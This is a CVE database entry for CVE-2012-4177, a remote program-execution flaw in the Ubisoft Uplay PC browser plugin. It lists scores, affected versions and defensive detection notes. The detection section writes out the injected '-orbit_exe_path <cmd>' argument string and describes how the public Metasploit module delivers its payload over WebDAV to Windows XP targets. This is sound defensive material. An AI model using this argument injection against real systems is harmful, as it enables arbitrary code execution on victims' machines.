cbcvebase.
CVE-2012-4177
published 2012-08-07

CVE-2012-4177: The web browser plugin for Ubisoft Uplay PC before 2.0.4 allows remote attackers to execute arbitrary programs via the -orbit_exe_path command line argument.

PriorityP274critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
58.02%
99.0th percentile
The web browser plugin for Ubisoft Uplay PC before 2.0.4 allows remote attackers to execute arbitrary programs via the -orbit_exe_path command line argument.

Affected

4 ranges
VendorProductVersion rangeFixed in
ubiuplay_pc<= 2.0.3
ubiuplay_pc
ubiuplay_pc
ubiuplay_pc

Detection & IOCsextracted from sources · hover to see the quote

command-orbit_product_id 1 -orbit_exe_path <cmd> -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play
command-orbit_exe_path
  • Detect ActiveX instantiation of the Ubisoft uplay ActiveX component (classid) within a browser context, particularly when the `open()` method is called with `-orbit_exe_path` in its argument string.
  • The exploit targets only Windows XP SP3 (NT 5.1) user agents; filter for exploitation attempts scoped to this UA string.
  • The exploit serves the malicious payload via WebDAV over port 80; monitor for WebDAV PROPFIND/OPTIONS requests on port 80 originating from browser processes, especially followed by UNC path access (\\<host>\<share>\<random8>.exe).
  • Look for processes spawned by the uplay browser plugin with command-line arguments containing `-orbit_exe_path` pointing to a UNC path.
  • ·The Metasploit module enforces SRVPORT=80 and URIPATH=/ and will fail otherwise; detections scoped to port 80 WebDAV are appropriate for this exploit as delivered.
  • ·Exploitation requires the victim user to be signed into uplay (or have auto-sign-in enabled) and uplay must not already be running at the time of the attack.
  • ·The exploit only engages Windows XP SP3 targets (NT 5.1 UA check); other OS versions will receive a 404 and not be exploited by this module.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.